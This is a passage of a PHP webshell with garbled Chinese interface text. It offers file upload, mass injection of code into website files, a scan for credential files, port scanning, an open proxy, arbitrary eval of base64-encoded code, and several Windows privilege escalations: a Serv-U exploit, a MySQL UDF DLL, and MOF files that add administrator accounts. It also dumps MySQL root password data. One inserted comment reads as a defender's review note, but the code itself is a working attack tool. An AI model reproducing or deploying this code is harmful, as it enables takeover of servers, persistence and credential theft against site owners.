'; } break; case "issql": session_start(); if ($_POST['sqluser'] && $_POST['sqlpass']) { $_SESSION['sql_user'] = $_POST['sqluser']; $_SESSION['sql_password'] = $_POST['sqlpass']; } if ($_POST['sqlhost']) { $_SESSION['sql_host'] = $_POST['sqlhost']; } else { $_SESSION['sql_host'] = 'localhost'; } if ($_POST['sqlport']) { $_SESSION['sql_port'] = $_POST['sqlport']; } else { $_SESSION['sql_port'] = '3306'; } if ($_SESSION['sql_user'] && $_SESSION['sql_password']) { if (!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']))) { unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']); die(html_a('?eanver=sqlshell', '����ʧ���뷵��')); } } else { die(html_a('?eanver=sqlshell', '����ʧ���뷵��')); } $query = mysql_query("SHOW DATABASES", $sqlcon); html_n('���ݿ��б�:'); while ($db = mysql_fetch_array($query)) { html_a('?eanver=issql&db=' . $db['Database'], $db['Database']); echo '  '; } html_n(''); if ($_GET['db']) { css_js("3"); mysql_select_db($_GET['db'], $sqlcon); html_n('

'); html_select(array(0 => "--SQL�﷨--", 7 => "��������", 8 => "ɾ������", 9 => "�޸�����", 10 => "�����ݱ�", 11 => "ɾ���ݱ�", 12 => "�����ֶ�", 13 => "ɾ���ֶ�"), 0, "onchange='return Full(options[selectedIndex].value)'"); html_input("submit", "doquery", "ִ��"); html_a("?eanver=issql&db=" . $_GET['db'], $_GET['db']); html_n('--->'); html_a("?eanver=issql&db=" . $_GET['db'] . "&table=" . $_GET['table'], $_GET['table']); html_n('

'); if (!empty($_POST['sql'])) { if (@mysql_query($_POST['sql'], $sqlcon)) { echo "ִ��SQL���ɹ�"; } else { echo "����: " . mysql_error(); } } if ($_GET['table']) { html_n(''); $query = "SHOW COLUMNS FROM " . $_GET['table']; $result = mysql_query($query, $sqlcon); $fields = array(); while ($row = mysql_fetch_assoc($result)) { array_push($fields, $row['Field']); html_n(''); } html_n(''); $result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error()); while ($text = @mysql_fetch_assoc($result)) { foreach ($fields as $row) { if ($text[$row] == "") { $text[$row] = 'NULL'; } html_n(''); } echo ''; } } else { $query = "SHOW TABLES FROM " . $_GET['db']; $dat = mysql_query($query, $sqlcon) or die(mysql_error()); while ($row = mysql_fetch_row($dat)) { html_n(""); } } } break; case "upfiles": html_n(''); if (!empty($_POST['path'])) { html_n(''); if (!empty($_POST['path'])) { html_n(''); if (!empty($_POST['path'])) { html_n(''); if (!empty($_POST['path'])) { html_n(' \t \t \t \t
' . $row['Field'] . '
' . $text[$row] . '
" . $row[0] . "
�����������ϴ������ļ���С: ' . @get_cfg_var('upload_max_filesize') . '
'); html_input("text", "uppath", root_dir, "
�ϴ���·��: ", "51"); print << function addTank(){ var k=0; k=k+1; k=tank.rows.length; newRow=document.all.tank.insertRow(-1) newcell=newRow.insertCell() newcell.innerHTML=" " } function delTank() { if(tank.rows.length==1) return; var checkit = false; for (var i=0;i

��ѡ��Ҫ�ϴ����ļ���
END; html_n('
'); if ($_POST['upfiles']) { foreach ($_FILES["upfile"]["error"] as $key => $error) { if ($error == UPLOAD_ERR_OK) { $tmp_name = $_FILES["upfile"]["tmp_name"][$key]; $name = $_FILES["upfile"]["name"][$key]; $uploadfile = str_path($_POST['uppath'] . '/' . $name); $upload = @copy($tmp_name, $uploadfile) ? $name . $msg[2] : @move_uploaded_file($tmp_name, $uploadfile) ? $name . $msg[2] : $name . $msg[3]; echo '

' . $upload; } } } html_n(''); break; case "guama": $patht = isset($_POST['path']) ? $_POST['path'] : root_dir; $typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx"; $codet = isset($_POST['code']) ? $_POST['code'] : ""; html_n('
�ļ���������"|"����,Ҳ������ָ���ļ���.

'); html_input("text", "path", $patht, "·����Χ", "45"); html_input("checkbox", "pass", "", "ʹ��Ŀ¼����", "", true); html_input("text", "type", $typet, "

�ļ�����", "60"); html_text("code", "67", "5", $codet); html_n('

'); html_radio("��������", "��������", "guama", "qingma"); html_input("submit", "passreturn", "��ʼ"); html_n('
Ŀ���ļ�:

'); if (isset($_POST['pass'])) { $bool = true; } else { $bool = false; } do_passreturn($patht, $codet, $_POST['return'], $bool, $typet); } break; case "tihuan": html_n('
�˹��ܿ������滻�ļ�����,��С��ʹ��.

'); html_input("text", "path", root_dir, "·����Χ", "45"); html_input("checkbox", "pass", "", "ʹ��Ŀ¼����", "", true); html_text("newcode", "67", "5", $_POST['newcode']); html_n('

�滻Ϊ'); html_text("oldcode", "67", "5", $_POST['oldcode']); html_input("submit", "passreturn", "�滻", "

"); html_n('
Ŀ���ļ�:

'); if (isset($_POST['pass'])) { $bool = true; } else { $bool = false; } do_passreturn($_POST['path'], $_POST['newcode'], "tihuan", $bool, $_POST['oldcode']); } break; case "scanfile": css_js("4"); html_n('
�˹��ܿɺܷ��������������MYSQL�û�����������ļ�,������Ȩ.
���������ļ�̫��ʱ,��Ӱ��ִ���ٶ�,������ʹ��Ŀ¼����.

'); html_input("text", "path", root_dir, "·����", "45"); html_input("checkbox", "pass", "", "ʹ��Ŀ¼����", "", true); html_input("text", "code", $_POST['code'], "

�ؼ���", "40"); html_select(array("--MYSQL�����ļ�--", "Discuz", "PHPWind", "phpcms", "dedecms", "PHPBB", "wordpress", "sa-blog", "o-blog"), 0, "onchange='return Fulll(options[selectedIndex].value)'"); html_n('

'); html_radio("�����ļ���", "������������", "scanfile", "scancode"); html_input("submit", "passreturn", "����"); html_n('
�ҵ��ļ�:

'); if (isset($_POST['pass'])) { $bool = true; } else { $bool = false; } do_passreturn($_POST['path'], $_POST['code'], $_POST['return'], $bool); } break; case "scanphp": html_n('
ԭ���Ǹ��������붨���,��鿴�����жϺ��ٽ���ɾ��.

'); html_input("text", "path", root_dir, "���ҷ�Χ", "40"); html_input("checkbox", "pass", "", "ʹ��Ŀ¼����

�ű�����", "", true); html_select(array("php" => "PHP", "asp" => "ASP", "aspx" => "ASPX", "jsp" => "JSP")); html_input("submit", "passreturn", "����", "

"); html_n('
�ҵ��ļ�:

'); if (isset($_POST['pass'])) { $bool = true; } else { $bool = false; } do_passreturn($_POST['path'], $_POST['class'], "scanphp", $bool); } break; case "port": $Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1'; $Port_port = isset($_POST['port']) ? $_POST['port'] : '21|23|25|80|110|135|139|445|1433|3306|3389|43958|5631|2049|873'; print <<
ɨ��IP
�˿ں�
END; if (!empty($_POST['ip']) && !empty($_POST['port'])) { echo '
'; $ports = explode('|', $_POST['port']); for ($i = 0; $i < count($ports); $i++) { $fp = @fsockopen($_POST['ip'], $ports[$i], $errno, $errstr, 2); echo $fp ? '���Ŷ˿� ---> ' . $ports[$i] . '
' : '�رն˿� ---> ' . $ports[$i] . '
'; ob_flush(); flush(); } echo '
'; } break;
// NOTE(review, defender): "getcode" makes the server fetch whatever URL arrives
// in the POST field 'url' and echoes the response body back unchanged, so the
// request seen by the remote site originates from this host.
// The '@' suppresses warnings from a failed fetch.
// Detection: outbound HTTP from the web tier to unrelated hosts that lines up in
// time with POSTs to this script. Mitigation: restrict egress from the web
// server, and turn off allow_url_fopen where the application does not need
// URL wrappers, since file_get_contents() depends on it for remote URLs.
case "getcode": if (isset($_POST['url'])) { $proxycontents = @file_get_contents($_POST['url']); echo $proxycontents ? $proxycontents : "

��ȡ URL ����ʧ��

"; exit; } print <<
���ߴ���

  • �ñ����ܽ�ʵ�ּ򵥵� HTTP ����,������ʾʹ�����·����ͼƬ�����Ӽ�CSS��ʽ��.
  • �ñ����ܿ���ͨ�������������Ŀ��URL,����֧�� SQL Injection ̽���Լ�ijЩ�����ַ�.
  • �ñ���������� URL,��Ŀ�����������µ�IP��¼�� : {$_SERVER['SERVER_NAME']}
URL:
END; break; case "servu": $SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P'; print <<[ִ������] [�����û�]
\t
ServU�˿�
\t
ServU�û�
\t
ServU����
END; if ($_GET['o'] == 'adduser') { print <<�ʺ� ���� Ŀ¼ END; } else { print <<��Ȩ����
END; } echo '
'; if (!empty($_POST['SUPort']) && !empty($_POST['SUUser']) && !empty($_POST['SUPass'])) { echo '
'; $sendbuf = ""; $recvbuf = ""; $domain = "-SETDOMAIN\r\n" . "-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n" . "-TZOEnable=0\r\n" . " TZOKey=\r\n"; $adduser = "-SETUSERSETUP\r\n" . "-IP=0.0.0.0\r\n" . "-PortNo=21\r\n" . "-User=" . $_POST['user'] . "\r\n" . "-Password=" . $_POST['password'] . "\r\n" . "-HomeDir=c:\\\r\n" . "-LoginMesFile=\r\n" . "-Disable=0\r\n" . "-RelPaths=1\r\n" . "-NeedSecure=0\r\n" . "-HideHidden=0\r\n" . "-AlwaysAllowLogin=0\r\n" . "-ChangePassword=0\r\n" . "-QuotaEnable=0\r\n" . "-MaxUsersLoginPerIP=-1\r\n" . "-SpeedLimitUp=0\r\n" . "-SpeedLimitDown=0\r\n" . "-MaxNrUsers=-1\r\n" . "-IdleTimeOut=600\r\n" . "-SessionTimeOut=-1\r\n" . "-Expire=0\r\n" . "-RatioUp=1\r\n" . "-RatioDown=1\r\n" . "-RatiosCredit=0\r\n" . "-QuotaCurrent=0\r\n" . "-QuotaMaximum=0\r\n" . "-Maintenance=None\r\n" . "-PasswordType=Regular\r\n" . "-Ratios=None\r\n" . " Access=" . $_POST['part'] . "\\|RWAMELCDP\r\n"; $deldomain = "-DELETEDOMAIN\r\n" . "-IP=0.0.0.0\r\n" . " PortNo=21\r\n"; $sock = @fsockopen("127.0.0.1", $_POST["SUPort"], $errno, $errstr, 10); $recvbuf = @fgets($sock, 1024); echo "�������ݰ�: {$recvbuf}
"; $sendbuf = "USER " . $_POST["SUUser"] . "\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "�������ݰ�: {$sendbuf}
"; $recvbuf = @fgets($sock, 1024); echo "�������ݰ�: {$recvbuf}
"; $sendbuf = "PASS " . $_POST["SUPass"] . "\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "�������ݰ�: {$sendbuf}
"; $recvbuf = @fgets($sock, 1024); echo "�������ݰ�: {$recvbuf}
"; $sendbuf = "SITE MAINTENANCE\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "�������ݰ�: {$sendbuf}
"; $recvbuf = @fgets($sock, 1024); echo "�������ݰ�: {$recvbuf}
"; $sendbuf = $domain; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "�������ݰ�: {$sendbuf}
"; $recvbuf = @fgets($sock, 1024); echo "�������ݰ�: {$recvbuf}
"; $sendbuf = $adduser; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "�������ݰ�: {$sendbuf}
"; $recvbuf = @fgets($sock, 1024); echo "�������ݰ�: {$recvbuf}
"; if (!empty($_POST['SUCommand'])) { $exp = @fsockopen("127.0.0.1", "21", $errno, $errstr, 10); $recvbuf = @fgets($exp, 1024); echo "�������ݰ�: {$recvbuf}
"; $sendbuf = "USER " . $_POST['user'] . "\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); echo "�������ݰ�: {$sendbuf}
"; $recvbuf = @fgets($exp, 1024); echo "�������ݰ�: {$recvbuf}
"; $sendbuf = "PASS " . $_POST['password'] . "\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); echo "�������ݰ�: {$sendbuf}
"; $recvbuf = @fgets($exp, 1024); echo "�������ݰ�: {$recvbuf}
"; $sendbuf = "site exec " . $_POST["SUCommand"] . "\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); echo "�������ݰ�: site exec " . $_POST["SUCommand"] . "
"; $recvbuf = @fgets($exp, 1024); echo "�������ݰ�: {$recvbuf}
"; $sendbuf = $deldomain; @fputs($sock, $sendbuf, strlen($sendbuf)); echo "�������ݰ�: {$sendbuf}
"; $recvbuf = @fgets($sock, 1024); echo "�������ݰ�: {$recvbuf}
"; @fclose($exp); } @fclose($sock); echo '
'; } break; case "phpcode": $phpcode = isset($_POST['phpcode']) ? $_POST['phpcode'] : "phpinfo();"; if ($phpcode != 'phpinfo();') { $phpcode = htmlspecialchars(base64_decode($phpcode)); } echo '
����д<? ?>��ǩ,�˹����Ż�ʹ��BASE64���ܴ��ͣ���ֹ������뱻�������˾�֪����ССϸ�ڣ�ע���ɾͣ�



'; if (!empty($_POST['phpcode'])) { echo "

"; eval(stripslashes(base64_decode($_POST['phpcode']))); } html_n('
'); break; case "myexp": $MSG_BOX = '���ȵ���DLL,��ִ������.MYSQL�û�����ΪrootȨ��,����·�������ܼ���DLL�ļ�.
mysql5.1�汾��������mysql���Ŀ¼��װUDF��������ʧ��������NTFS-ADS�����ܴ����ļ���'; $info = '�������'; $mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $mpath = 'C:/windows/mysqlDll.dll'; $sqlcmd = 'ver'; if (isset($_POST['mhost']) && isset($_POST['muser'])) { $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; $mpath = File_Str($_POST['mpath']); $sqlcmd = $_POST['sqlcmd']; $conn = mysql_connect($mhost . ':' . $mport, $muser, $mpass); if ($conn) { @mysql_select_db($mdata); if (!empty($_POST['outdll']) && !empty($_POST['mpath'])) { $query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);"; if (@mysql_query($query, $conn)) { $shellcode = Mysql_shellcode(); $query = "INSERT into Envl_Temp_Tab values (CONVERT(" . $shellcode . ",CHAR));"; if (@mysql_query($query, $conn)) { $query = 'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \'' . $mpath . '\';'; if (@mysql_query($query, $conn)) { $ap = explode('/', $mpath); $inpath = array_pop($ap); $query = 'Create Function state returns string soname \'' . $inpath . '\';'; $MSG_BOX = @mysql_query($query, $conn) ? '��װDLL�ɹ�' : '��װDLLʧ��'; } else { $MSG_BOX = '����DLL�ļ�ʧ��'; } } else { $MSG_BOX = 'д����ʱ��ʧ��'; } @mysql_query('DROP TABLE Envl_Temp_Tab;', $conn); } else { $MSG_BOX = '������ʱ��ʧ��'; } } if (!empty($_POST['runcmd'])) { $query = 'select state("' . $sqlcmd . 
'");'; $result = @mysql_query($query, $conn); if ($result) { $k = 0; $info = NULL; while ($row = @mysql_fetch_array($result)) { $infotmp .= $row[$k]; $k++; } $info = $infotmp; $MSG_BOX = 'ִ�гɹ�'; } else { $MSG_BOX = 'ִ��ʧ��'; } } } else { $MSG_BOX = '����MYSQLʧ��'; } } print << function Fullm(i){ \tStr = new Array(11); \tStr[0] = "ver"; \tStr[1] = "net user KillWaf 1P@ssWord /add"; \tStr[2] = "net localgroup administrators KillWaf /add"; \tStr[3] = "net start Terminal Services"; \tStr[4] = "tasklist /svc"; \tStr[5] = "netstat -ano"; \tStr[6] = "ipconfig"; \tStr[7] = "net user guest /active:yes"; \tStr[8] = "copy c:\\\\1.php d:\\\\2.php"; \tStr[9] = "tftp -i 219.134.6.245 get server.exe c:\\\\server.exe"; \tStr[10] = "net start telnet"; \tStr[11] = "shutdown -r -t 0"; \tmform.sqlcmd.value = Str[i]; \treturn true; }
{$MSG_BOX}
��ַ �˿� �û� ���� ����
�ɼ���·��
��װ�ɹ������
END; break; case "mysql_exec": if (isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass'])) { if (@mysql_connect($_POST['mhost'] . ':' . $_POST['mport'], $_POST['muser'], $_POST['mpass'])) { $cookietime = time() + 24 * 3600; setcookie('m_eanverhost', $_POST['mhost'], $cookietime); setcookie('m_eanverport', $_POST['mport'], $cookietime); setcookie('m_eanveruser', $_POST['muser'], $cookietime); setcookie('m_eanverpass', $_POST['mpass'], $cookietime); die('���ڵ�½,���Ժ�...'); } } print <<
��ַ
�˿�
�û�
����
END; break; case "winapi": //Windows����ӿ� //function winshell() //{ $nop = '  '; if ($_GET['winshell'] == 'wscript') { $wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user'; $wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe'; print <<

{$nop} -> CMD·��
{$nop}


END; if ($_POST['do'] == 'do') { $ww = $wcpth . " /c " . $wcmd; $phpwsh = new COM("Wscript.Shell") or die("����Shell.Wscript���ʧ��"); $phpexec = $phpwsh->exec($ww); $execoutput = $wshexec->stdout(); $result = $execoutput->readall(); echo $result; @$phpwsh->Release(); $phpwsh = NULL; } } elseif ($_GET['winshell'] == 'shelluser') { $wuser = $_POST['wuser'] ? $_POST['wuser'] : 'silic'; $wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#'; print <<

Shell.Users������ӹ���Ա

{$nop}�½��û�����
{$nop}���û����룺




END; if ($_POST['do'] = 'do') { $shell = new COM("Shell.Users"); $cmd = $shell->create($wuser); $cmd->changePassword($wpasw, ""); $cmd->setting["AccountType"] = 3; } } elseif ($_GET['winshell'] == 'regedit') { $shell1 = new COM("wscript.shell") or die("require windows host"); $action = isset($_POST['action']) ? $_POST['action'] : ''; echo '
'; echo '
��ȡ&д��&ɾ��ע���

'; echo '
'; print <<
Rpath: 

END; $rpath = isset($_POST['rpath']) ? $_POST['rpath'] : ''; $rpath = str_replace("\\\\", "\\", $rpath); if ($action == "read") { $out = $shell1->RegRead($rpath); echo '
' . var_dump($out) . '
'; echo '

'; } print <<
Wpath:

Wtype:  Wvalue: 


END; $wpath = isset($_POST['wpath']) ? $_POST['wpath'] : ''; $wpath = str_replace("\\\\", "\\", $wpath); $wtype = isset($_POST['wtype']) ? $_POST['wtype'] : ''; $wvalue = isset($_POST['wvalue']) ? $_POST['wvalue'] : ''; if ($action == "write") { $shell1->RegWrite($wpath, $wvalue, $wtype); } print <<
Dpath:

END; $dpath = isset($_POST['dpath']) ? $_POST['dpath'] : ''; $dpath = str_replace("\\\\", "\\", $dpath); if ($action == "del") { $out = $shell1->RegDelete($dpath); } } else { $tip = "�ݲ��Ա����ܿ��õĿ�����Ϊ���֮һ
Webshell���ڷ���������ΪWindowsϵͳ
PHP��Ȩ���������ڷdz����ε�ʱ����Գ��Ա�����



"; print <<

[ WScript��� ]

������ʹ��PHP����Windows����е�Wscript�����
Wscript����cmd�������
{$tip} [ Shell.User��� ]

������ʹ��PHP����Windows����е�Shell.user���
USER���ΪWindowsϵͳ�û�����������
{$tip} [ ע������� ]

������ʹ��PHP����Windows����е�Shell.Wscript���
�����ܿɶ�ȡ��д�룬ɾ��ע������� RegRead()������ȡϵͳע�������
{$tip}
END; } //} break; case "mofshell": session_start(); if (!empty($_POST['submit'])) { setcookie("connect"); setcookie("connect[host]", $_POST['host']); setcookie("connect[user]", $_POST['user']); setcookie("connect[pass]", $_POST['pass']); setcookie("connect[dbname]", $_POST['dbname']); setcookie("connect[path]", $_POST['path']); echo ""; } if (empty($_GET["action"])) { echo "
"; echo "ip:"; echo "

"; echo "�ʻ�:"; echo "

"; echo "����:"; echo "

"; echo "����:"; echo "

"; echo "��дĿ¼(''savefile''���ļ���):"; echo "

"; echo "

"; echo "
"; echo "
ps:mof��Ȩ������windows������
1:mof��Ȩ����wscript.shell�齨ִ�������shell.users���û�
2:����������ʱ�����ã�����Ӱ��ִ��Ч��
3:������֧��wscript.shell��shell.user˫����Ȩ
4:ִ����Ϻ���ȴ�Щʱ���ٲ鿴���
5:2�ַ�ʽ����ͬһʱ��ִ�У������ĵȴ��������ִ����������

��ͣ���ʻ�����취:
"; echo "\r\n��һ net stop winmgmt ֹͣ����
\r\n�ڶ� ɾ���ļ��У�C:\\WINDOWS\\system32\\wbem\\Repository\\
\r\n���� net start winmgmt ��������
\r\n���ģ���ϲ�����ִ���ˡ�
\r\nC:\\WINDOWS\\system32\\wbem\\Repository\\ �ŵ��Ǵ���⡡����ִ�е�.mof���ᱻ���뵽������ˡ�
\r\nȻ��һֱ���ű����õ�ʱ��ִ�С���
\r\nɾ�����������������ؽ���Ĭ�ϴ���⡡����������ǰִ��mof��û�ˡ�
"; exit; } if ($_GET[action] == 'connect') { $conn = mysql_connect($_COOKIE["connect"]["host"], $_COOKIE["connect"]["user"], $_COOKIE["connect"]["pass"]) or die('
' . mysql_error() . '
'); echo "
"; echo "
Cmd:"; echo "
"; echo "
"; echo "

"; echo "
"; echo ""; echo "
"; echo ""; echo "
"; echo "
"; echo ""; echo "
"; echo "
"; if (isset($_POST['cmd'])) { $strCmd = $_POST['cmd']; $cmdshell = 'cmd /c ' . $strCmd . '>' . $_COOKIE["connect"]["path"]; $mofname = "c:/windows/system32/wbem/mof/system.mof"; $payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\")\r\n \r\ninstance of __EventFilter as \$EventFilter\r\n{\r\n EventNamespace = \"Root\\\\\\\\Cimv2\";\r\n Name = \"filtP2\";\r\n Query = \"Select * From __InstanceModificationEvent \"\r\n \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \"\r\n \"And TargetInstance.Second = 5\";\r\n QueryLanguage = \"WQL\";\r\n};\r\n \r\ninstance of ActiveScriptEventConsumer as \$Consumer\r\n{\r\n Name = \"consPCSV2\";\r\n ScriptingEngine = \"JScript\";\r\n ScriptText =\r\n \"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"{$cmdshell}\\\\\")\";\r\n };\r\n \r\ninstance of __FilterToConsumerBinding\r\n{\r\n Consumer = \$Consumer;\r\n Filter = \$EventFilter;\r\n};"; mysql_select_db($_COOKIE["connect"]["dbname"], $conn); $sql1 = "select '{$payload}' into dumpfile '{$mofname}';"; if (mysql_query($sql1)) { echo "
ִ�����!
����\"��ȡwscriptִ�н��\"�鿴���!!
���ɹ���ִ�м��Ρ�
ps:wscriptִ����Ҫwscript.shell�齨���ڡ�
"; } else { die(mysql_error()); } mysql_close($conn); } if (isset($_POST['flag'])) { $conn = mysql_connect($_COOKIE["connect"]["host"], $_COOKIE["connect"]["user"], $_COOKIE["connect"]["pass"]) or die('
' . mysql_error() . '
'); $sql2 = "select load_file(\"" . $_COOKIE["connect"]["path"] . "\");"; $result2 = mysql_query($sql2); $num = mysql_num_rows($result2); while ($row = mysql_fetch_array($result2, MYSQL_NUM)) { echo "
"; echo '
' . $row[0] . '
'; } mysql_close($conn); } if (isset($_POST['shelluser'])) { $mofname = "c:/windows/system32/wbem/mof/system.mof"; $payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\")\r\n \r\ninstance of __EventFilter as \$EventFilter\r\n{\r\n EventNamespace = \"Root\\\\\\\\Cimv2\";\r\n Name = \"filtP2\";\r\n Query = \"Select * From __InstanceModificationEvent \"\r\n \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \"\r\n \"And TargetInstance.Second = 5\";\r\n QueryLanguage = \"WQL\";\r\n};\r\n \r\ninstance of ActiveScriptEventConsumer as \$Consumer\r\n{\r\n Name = \"consPCSV2\";\r\n ScriptingEngine = \"JScript\";\r\n ScriptText = \r\n\"var WSH = new ActiveXObject(\\\\\"Shell.Users\\\\\")\\\\nz=WSH.create(\\\\\"MofNewUser\\\\\")\\\\nz.changePassword(\\\\\"ASDfg123!@#...\\\\\", \\\\\"\\\\\")\\\\nz.setting(\\\\\"AccountType\\\\\")=3\";\r\n };\r\n \r\ninstance of __FilterToConsumerBinding\r\n{\r\n Consumer = \$Consumer;\r\n Filter = \$EventFilter;\r\n};"; mysql_select_db($_COOKIE["connect"]["dbname"], $conn); $sql1 = "select '{$payload}' into dumpfile '{$mofname}';"; if (mysql_query($sql1)) { echo "
ִ���������,�ʻ���MofNewUser ���룺ASDfg123!@#...
ps:ShellUser�����޻��Թ���,��5���Ӻ����в鿴���
"; } else { die(mysql_error()); } mysql_close($conn); } } break; case "readpass": if (isset($_POST['sub'])) { $name = $_POST['name']; $pass = $_POST['password']; $host = $_POST['host']; $db = $_POST['db']; $link = mysql_connect($host, $name, $pass); if (!link) { die("could not connect" . mysql_error()); } if (!mysql_select_db($db, $link)) { die("db" . mysql_error()); } $db_path_sql = "select @@basedir"; if ($n = mysql_query($db_path_sql)) { $db_path_rs = mysql_fetch_array($n); $db_path = str_replace("\\", "/", $db_path_rs[0]); } $dropmoon = 'DROP table moon'; $sql = "CREATE TABLE moon (`code` TEXT NOT NULL ) ENGINE = MYISAM CHARACTER SET utf8 COLLATE utf8_general_ci;"; $exp = "LOAD DATA LOCAL INFILE '" . $db_path . "data/mysql/user.MYD' INTO TABLE moon fields terminated by '' LINES TERMINATED BY '\0';"; $select = "SELECT code FROM moon"; $pass = ""; mysql_query($dropmoon); if (mysql_query($sql)) { if ($row = mysql_query($exp)) { if ($row = mysql_query($select)) { while ($rows = mysql_fetch_array($row)) { echo $pass .= $rows['code']; } } } } } else { echo '
'; echo "

MYSQL��Ȩ�޶�ȡROOT���빤��

"; echo '
ip��   
'; echo '
�ʻ���
'; echo '
���룺
'; echo '
������
'; echo '
  
'; } break; case "othersql": //�������ݿ����� //function otherdb(){ $db = isset($_GET['db']) ? $_GET['db'] : 'ms'; print << END; if ($db == "ms") { $mshost = isset($_POST['mshost']) ? $_POST['mshost'] : 'localhost'; $msuser = isset($_POST['msuser']) ? $_POST['msuser'] : 'sa'; $mspass = isset($_POST['mspass']) ? $_POST['mspass'] : ''; $msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master'; $msaction = isset($_POST['action']) ? $_POST['action'] : ''; $msquery = isset($_POST['mssql']) ? $_POST['mssql'] : ''; $msquery = stripslashes($msquery); print <<
������ �ʻ�: ����: ����:

END; if ($msaction == 'msquery') { $msconn = mssql_connect($mshost, $msuser, $mspass); mssql_select_db($msdbname, $msconn) or die("connect error :" . mssql_get_last_message()); $msresult = mssql_query($msquery) or die(mssql_get_last_message()); echo '' . "\n\n"; for ($i = 0; $i < mssql_num_fields($msresult); $i++) { echo '\n"; } echo "\n"; mssql_data_seek($result, 0); while ($msrow = mssql_fetch_row($msresult)) { echo "\n"; for ($i = 0; $i < mssql_num_fields($msresult); $i++) { echo ''; } echo "\n"; } echo "
' . mssql_field_name($msresult, $i) . "
' . "{$msrow[$i]}" . '
"; mssql_free_result($msresult); mssql_close(); } } elseif ($db == "ora") { $orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost'; $oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521'; $orauser = isset($_POST['orauser']) ? $_POST['orauser'] : 'root'; $orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '123456'; $orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL'; $oraaction = isset($_POST['action']) ? $_POST['action'] : ''; $oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : ''; $oraquery = stripslashes($oraquery); print <<
����: �˿�: �ʻ�: ����: SID:

END; if ($oraaction == 'oraquery') { $oralink = OCILogon($orauser, $orapass, "(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST={$orahost})(PORT = {$oraport}))(CONNECT_DATA =(SID={$orasid})))") or die(ocierror()); $oraresult = ociparse($oralink, $oraquery) or die(ocierror()); $orarow = oci_fetch_row($oraresult); echo '' . "\n\n"; for ($i = 0; $i < oci_num_fields($oraresult); $i++) { echo '\n"; } echo "\n"; ociresult($oraresult, 0); while ($orarow = ora_fetch_row($oraresult)) { echo "\n"; for ($i = 0; $i < ora_num_fields($result); $i++) { echo ''; } echo "\n"; } echo "
' . oci_field_name($oraresult, $i) . "
' . "{$orarow[$i]}" . '
"; oci_free_statement($oraresult); ocilogoff(); } } elseif ($db == "ifx") { $ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : 'root'; $ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '123456'; $ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb'; $ifxaction = isset($_POST['action']) ? $_POST['action'] : ''; $ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : ''; $ifxquery = stripslashes($ifxquery); print <<
����: �ʻ�: ����:

END; if ($ifxaction == 'ifxquery') { $ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg()); $ifxresult = ifx_query($ifxquery, $ifxlink) or die(ifx_errormsg()); $ifxrow = ifx_fetch_row($ifxresult); echo '' . "\n\n"; for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) { echo '\n"; } echo "\n"; mysql_data_seek($ifxresult, 0); while ($ifxrow = ifx_fetch_row($ifxresult)) { echo "\n"; for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) { echo ''; } echo "\n"; } echo "
' . ifx_fieldproperties($ifxresult) . "
' . "{$ifxrow[$i]}" . '
"; ifx_free_result($ifxresult); ifx_close(); } } elseif ($db == "db2") { $db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost'; $db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000'; $db2user = isset($_POST['db2user']) ? $_POST['db2user'] : 'root'; $db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '123456'; $db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql'; $db2action = isset($_POST['action']) ? $_POST['action'] : ''; $db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : ''; $db2query = stripslashes($db2query); print <<
����: �˿�: �ʻ�: ����: ����:

